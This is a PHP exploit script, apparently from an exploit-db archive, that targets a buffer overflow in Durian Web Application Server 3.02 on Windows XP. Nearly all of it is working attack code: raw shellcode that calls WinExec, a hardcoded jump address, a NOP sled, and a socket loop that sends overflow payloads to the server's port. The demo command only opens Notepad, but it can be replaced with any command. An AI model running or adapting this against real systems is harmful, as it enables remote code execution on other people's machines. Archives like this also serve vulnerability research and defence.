exploit-db-mirror/exploits/windows/remote/3037.php

<?php
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit

by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

tested against xp sp2 ita

software site -> http://sourceforge.net/projects/durian/

*/

error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";

$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";

//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";

$ch  =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);

    for ($j=0; $j<count($ch); $j++){
        for ($i=0; $i<count($size); $i++){
            $junk="";
            if (($j==2) and ($i==7)){
                $junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
                $junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
		$junk.=$eip; //jmp shellcode
		for ($n=1; $n<=100; $n++){
		    $junk.="\x90";
		}
		$junk.=$shellcode;
                for ($n=1; $n=(2300-strlen($junk)); $n++){
		    $junk.="\x90";
		}
            }
            else {
		for ($k=1; $k<=$size[$i]; $k++){
                    $junk.=$ch[$j];
                }
	    }
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
?>

# milw0rm.com [2006-12-29]